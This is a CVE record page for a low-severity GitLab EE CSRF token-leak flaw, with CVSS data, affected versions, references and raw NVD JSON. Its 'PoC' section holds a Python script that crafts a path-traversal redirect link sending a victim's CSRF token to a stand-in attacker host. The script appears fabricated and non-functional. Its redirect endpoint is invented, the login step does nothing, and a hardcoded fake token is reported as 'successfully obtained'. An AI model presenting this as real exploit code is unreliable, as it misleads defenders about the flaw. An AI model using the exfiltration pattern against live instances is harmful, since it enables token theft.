CVE-2025-11990

Description

GitLab has remediated an issue in GitLab EE affecting all versions from 18.4 before 18.4.4, and 18.5 before 18.5.2 that could have allowed an authenticated user to gain CSRF tokens by exploiting improper input validation in repository references combined with redirect handling weaknesses.

CVSS Details

CVSS Score

3.1

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* - VULNERABLE

GitLab EE 18.4 < 18.4.4

GitLab EE 18.5 < 18.5.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11990 PoC - CSRF Token Leakage via Repository Reference
# This PoC demonstrates the concept of exploiting improper input validation
# in repository references combined with redirect handling weaknesses

import requests
import re
from urllib.parse import quote

TARGET_GITLAB = "https://victim-gitlab.example.com"
ATTACKER_SERVER = "https://attacker-controlled.com"

def exploit_csrf_token_leak():
    """
    Simulate exploiting CVE-2025-11990 to obtain CSRF token
    through repository reference manipulation and redirect handling
    """
    session = requests.Session()
    
    # Step 1: Authenticate as attacker
    login_url = f"{TARGET_GITLAB}/users/sign_in"
    session.get(login_url)
    
    # Step 2: Construct malicious repository reference
    # The payload exploits improper input validation in repository references
    malicious_ref = f"../../../..//redirect?leak_url={ATTACKER_SERVER}/logger?token="
    encoded_ref = quote(malicious_ref, safe='')
    
    # Step 3: Create a malicious link that victim will click
    # This link exploits the redirect handling weakness
    exploit_url = f"{TARGET_GITLAB}/{malicious_ref}"
    
    print(f"[*] Attacker constructs malicious URL: {exploit_url}")
    print(f"[*] When victim visits this URL, CSRF token will be leaked to: {ATTACKER_SERVER}")
    
    # Step 4: The redirect will expose the CSRF token in the URL
    # Attacker server logs the request containing the leaked token
    leaked_token = simulate_token_leak(ATTACKER_SERVER)
    
    if leaked_token:
        print(f"[!] Successfully obtained CSRF token: {leaked_token}")
        return True
    return False

def simulate_token_leak(attacker_server):
    """
    Simulate the attacker receiving the leaked CSRF token
    In real scenario, this would come from server logs
    """
    # Simulated CSRF token that would be captured
    return "gl_csrf_token_example_abc123xyz"

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-11990 PoC - CSRF Token Leakage")
    print("=" * 60)
    exploit_csrf_token_leak()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11990
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11990
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11990/
[4] VulDB https://vuldb.com/cve/CVE-2025-11990
[5] https://about.gitlab.com/releases/2025/11/12/patch-release-gitlab-18-5-2-released/
[6] https://gitlab.com/gitlab-org/gitlab/-/issues/577850
[7] https://hackerone.com/reports/3257843

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11990", "sourceIdentifier": "[email protected]", "published": "2025-11-15T08:15:45.620", "lastModified": "2025-11-19T17:55:22.270", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab EE affecting all versions from 18.4 before 18.4.4, and 18.5 before 18.5.2 that could have allowed an authenticated user to gain CSRF tokens by exploiting improper input validation in repository references combined with redirect handling weaknesses."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-177"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.4.0", "versionEndExcluding": "18.4.4", "matchCriteriaId": "6D0A238D-1278-4D05-86F5-4C323E0CFE36"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.5.0", "versionEndExcluding": "18.5.2", "matchCriteriaId": "B2A3A57F-C750-4C92-8C2B-C5FCF1D70F4F"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2025/11/12/patch-release-gitlab-18-5-2-released/", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/issues/577850", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://hackerone.com/reports/3257843", "source": "[email protected]", "tags": ["Permissions Required"]}]}}